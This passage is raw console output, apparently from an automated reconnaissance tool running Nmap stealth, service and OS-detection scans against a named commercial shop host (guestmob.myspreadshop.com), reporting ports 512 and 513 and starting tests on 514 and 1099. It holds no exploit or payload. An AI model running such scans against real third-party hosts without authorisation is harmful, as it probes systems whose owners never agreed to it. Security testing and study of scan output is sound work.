Completed SYN Stealth Scan at 14:49, 0.11s elapsed (1 total ports)
Initiating Service scan at 14:49
Scanning 1 service on guestmob.myspreadshop.com (151.101.2.137)
Completed Service scan at 14:52, 159.12s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 14:52
Completed Traceroute at 14:52, 0.10s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:52
Completed Parallel DNS resolution of 1 host. at 14:52, 0.09s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 14:52
Completed NSE at 14:53, 90.59s elapsed
Initiating NSE at 14:53
Completed NSE at 14:53, 1.18s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.086s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649

PORT    STATE SERVICE VERSION
512/tcp open  exec?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 10.846 days (since Thu Feb 10 18:35:32 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 512/tcp)
HOP RTT      ADDRESS
1   98.65 ms 151.101.2.137

NSE: Script Post-scanning.
Initiating NSE at 14:53
Completed NSE at 14:53, 0.00s elapsed
Initiating NSE at 14:53
Completed NSE at 14:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.08 seconds
           Raw packets sent: 67 (6.368KB) | Rcvd: 38 (2.427KB)
 + -- --=[Port 513 opened... running tests...
====================================================================================•x[2022-02-21](14:53)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](14:53)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:53 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:53
Completed NSE at 14:53, 0.00s elapsed
Initiating NSE at 14:53
Completed NSE at 14:53, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:53
Completed Parallel DNS resolution of 1 host. at 14:53, 0.08s elapsed
Initiating SYN Stealth Scan at 14:53
Scanning guestmob.myspreadshop.com (151.101.66.137) [1 port]
Discovered open port 513/tcp on 151.101.66.137
Completed SYN Stealth Scan at 14:53, 0.09s elapsed (1 total ports)
Initiating Service scan at 14:53
Scanning 1 service on guestmob.myspreadshop.com (151.101.66.137)
Completed Service scan at 14:56, 160.56s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.66.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.66.137)
Initiating Traceroute at 14:56
Completed Traceroute at 14:56, 0.12s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:56
Completed Parallel DNS resolution of 1 host. at 14:56, 0.07s elapsed
NSE: Script scanning 151.101.66.137.
Initiating NSE at 14:56
Completed NSE at 14:58, 90.46s elapsed
Initiating NSE at 14:58
Completed NSE at 14:58, 1.23s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.66.137)
Host is up (0.096s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.130.137 151.101.194.137 151.101.2.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649

PORT    STATE SERVICE VERSION
513/tcp open  login?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 (89%), Linux 5.0 - 5.3 (89%), Linux 5.4 (89%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 20.961 days (since Mon Jan 31 15:54:54 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 513/tcp)
HOP RTT       ADDRESS
1   115.83 ms 151.101.66.137

NSE: Script Post-scanning.
Initiating NSE at 14:58
Completed NSE at 14:58, 0.00s elapsed
Initiating NSE at 14:58
Completed NSE at 14:58, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 258.01 seconds
           Raw packets sent: 71 (6.592KB) | Rcvd: 40 (2.508KB)
 + -- --=[Port 514 opened... running tests...
 + -- --=[Port 1099 opened... running tests...